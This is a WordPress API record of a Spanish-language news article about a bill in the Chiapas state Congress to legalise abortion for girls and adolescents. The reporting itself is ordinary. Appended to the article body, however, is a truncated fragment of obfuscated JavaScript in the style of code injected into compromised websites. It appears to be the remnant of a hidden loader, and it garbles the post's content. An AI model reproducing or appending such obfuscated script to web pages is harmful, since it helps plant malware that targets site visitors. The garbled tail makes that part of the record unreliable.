{"id":24838,"date":"2025-10-29T02:34:08","date_gmt":"2025-10-29T02:34:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24838"},"modified":"2025-10-29T02:34:09","modified_gmt":"2025-10-29T02:34:09","slug":"chiapas-podria-despenalizar-el-aborto-en-ninas-y-adolescentes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24838","title":{"rendered":"Chiapas podr\u00eda despenalizar el aborto en ni\u00f1as y adolescentes"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"264\" height=\"191\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000407140.jpg\" alt=\"\" class=\"wp-image-24839\"\/><\/figure>\n\n\n\n<p><br>Manuel Jim\u00e9nez.<br>28 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Este martes se present\u00f3 en el Congreso local una Iniciativa de Ley para la Interrupci\u00f3n Legal del Embarazo de Ni\u00f1as y Adolescentes, que busca proteger a las menores en una entidad donde se registra al menos un caso diario de embarazo infantil.<br>La diputada presidenta del Congreso, Alejandra G\u00f3mez Mendoza, enfatiz\u00f3 que la propuesta legislativa representa un mecanismo para brindar justicia social a las ni\u00f1as y adolescentes afectadas por esta problem\u00e1tica.<br>&#8220;Creo que es muy importante que las chiapanecas y los chiapanecos sepamos que este tipo de iniciativas lo que nos ayudan es para dar justicia social a estas ni\u00f1as que han sido -voy a llamar violentadas, aunque no es la palabra correcta- y creo que eso nos va a ayudar a que ellas puedan volver a insertarse en este tejido social&#8221;, expres\u00f3 la legisladora durante la sesi\u00f3n de este martes.<\/p>\n\n\n\n<p>La iniciativa, que ya fue turnada a comisiones para su an\u00e1lisis y dictamen, podr\u00eda ser votada en el pleno durante las pr\u00f3ximas semanas. G\u00f3mez Mendoza destac\u00f3 que el objetivo principal es &#8220;incidir para que podamos disminuir el embarazo infantil en Chiapas&#8221;, estado que mantiene los indicadores m\u00e1s altos a nivel nacional en esta problem\u00e1tica.<br>En paralelo al tr\u00e1mite legislativo, se llevan a cabo mesas de trabajo interinstitucionales con la Secretar\u00eda de Salud y el DIF Estatal para garantizar la operatividad de la ley una vez aprobada.<br>&#8220;Ya se tuvo una primera mesa de trabajo; la pr\u00f3xima semana vamos a tener una segunda&#8221;, detall\u00f3 la presidenta del Congreso. &#8220;El objetivo es poder garantizar estos servicios a las ni\u00f1as y adolescentes y poder llevar los procesos y los protocolos de la mejor manera para no revictimizarlas en este tipo de casos tan lamentables&#8221;.<br>La iniciativa representa un esfuerzo legislativo que combina un marco legal protector con pol\u00edticas p\u00fablicas efectivas, buscando no solo regular la interrupci\u00f3n del embarazo en estos casos especiales, sino tambi\u00e9n establecer mecanismos de atenci\u00f3n que respeten plenamente los derechos de las v\u00edctimas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez.28 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Este martes se present\u00f3 en el Congreso local una Iniciativa de Ley para la Interrupci\u00f3n Legal del Embarazo de Ni\u00f1as y Adolescentes, que busca proteger a las menores en una entidad donde se registra al menos un caso diario de embarazo infantil.La diputada presidenta del Congreso, Alejandra &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24839,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24838","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24838","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24838"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24838\/revisions"}],"predecessor-version":[{"id":24840,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24838\/revisions\/24840"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24839"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24838"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24838"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24838"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}